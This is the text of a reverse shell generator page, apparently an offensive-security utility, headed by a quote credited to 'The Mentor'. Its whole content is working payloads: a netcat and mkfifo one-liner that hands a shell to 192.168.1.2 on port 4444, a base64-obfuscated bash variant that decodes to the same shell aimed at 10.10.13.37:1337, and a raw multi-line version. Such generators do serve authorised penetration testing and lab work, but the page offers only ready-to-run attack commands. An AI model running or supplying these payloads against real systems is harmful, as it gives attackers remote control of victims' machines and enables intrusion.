"You may stop this individual, but you can't stop us all... after all, we're all alike."

(+++The Mentor+++)

Reverse Shell Generator

LHOST: LPORT: Language:

One-liner

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.2 4444 >/tmp/f

Encoded

bash -c "{echo,cm0gL3RtcC9mOwpta2ZpZm8gL3RtcC9mOwpjYXQgL3RtcC9mfC9iaW4vc2ggLWkgMj4mMXxuYyAxMC4xMC4xMy4zNyAxMzM3ID4vdG1wL2Y=}|{base64,-d}|{bash,-i}"

Raw

rm /tmp/f;
mkfifo /tmp/f;
cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.2 4444 >/tmp/f